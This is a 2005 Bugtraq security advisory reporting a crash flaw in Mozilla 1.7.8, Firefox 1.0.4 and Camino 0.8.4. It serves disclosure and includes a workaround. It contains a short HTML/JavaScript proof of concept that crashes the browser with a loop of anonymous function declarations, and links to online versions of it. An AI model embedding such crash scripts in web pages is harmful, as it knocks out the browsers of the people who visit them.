[39351] in bugtraq
Mozilla Multiple Product JavaScript Issue
daemon@ATHENA.MIT.EDU (Kurczaba Associates Advisories)
Wed Jun 29 18:20:05 2005
Message-ID: <42C2F54C.60904@kurczaba.com>
Date: Wed, 29 Jun 2005 15:23:56 -0400
From: Kurczaba Associates Advisories <advisories@kurczaba.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------
Vendor:
Mozilla (http://www.mozilla.org)
Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4
Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to
crash the above named browsers. The script can be executed both with and
without user intervention.
Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
//Run the function 20000 times
for (a = 0; a <= 20000; a++)
{
//Here is the special code that terminates the browser
function(){};
}
//Displays an alert to notify the user if the browser is not vulnerable.
alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----
Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm
Workaround:
Disable JavaScript
Date Discovered:
June 14, 2005
Severity:
Low
Credit:
Paul Kurczaba
